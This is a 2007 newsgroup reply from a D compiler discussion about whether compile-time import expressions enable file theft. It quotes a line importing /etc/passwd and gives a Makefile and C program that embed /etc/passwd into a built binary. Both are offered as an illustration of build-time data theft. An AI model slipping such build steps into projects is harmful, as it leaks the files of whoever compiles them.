DMD 1.005 release [security concerns about ImportExpressions]

[Yauheni Akhotnikau]

On Wed, 07 Feb 2007 09:30:31 +0300, Vladimir Panteleev  
<thecybershadow at gmail.com> wrote:

> On Tue, 06 Feb 2007 06:54:18 +0200, Walter Bright  
> <newshound at digitalmars.com> wrote:
>
>> http://www.digitalmars.com/d/changelog.html
>
> Hmm. What would prevent someone from writing programs like:
>    writef(import("/etc/passwd"));
> and trick someone to compile this program for them (under the pretext  
> that they don't have a D compiler, for example) to steal the user list  
> (or the contents of any other file with a known absolute or relative  
> path on the victim's system)?

I don't think that prevention of including some private data during  
compilation is a task of D compiler. That private data can be stolen even  
without new import expression -- it is only necessary to have ordinal unix  
utilities and make available. Consider the following sample:

=== Makefile ===
grab_password: grab_password.c
	gcc -o grab_password grab_password.c

grab_password.c: file_content.h

file_content.h: Makefile
	echo 'const char file_content[] = "\' > file_content.h
	uuencode /etc/passwd password-info | sed 's/\\/\\\\/g' | sed 's/"/\\"/g'  
| sed 's/^\(.*\)/\1\\n\\/' >> file_content.h
	echo '";' >> file_content.h

=== grab_password.c ===
#include <stdio.h>

#include "file_content.h"

int main()
{
	printf( "file content is: %s\n", file_content );
}

If someone sent this two files to you and asked to compile and return the  
result you will send your password without the knowledge about it.

And things are yet more interesting -- many projects use build tools those  
built on top on dynamic languages (SCons uses Python, Rake and Mxx_ru uses  
Ruby, MPC (from ACE) uses Perl for generating makefiles, OpenSSL uses Perl  
for configuration (at least on MSWin platfrom)). In such situation build  
script can grab what it wants without telling you a word.

-- 
Regards,
Yauheni Akhotnikau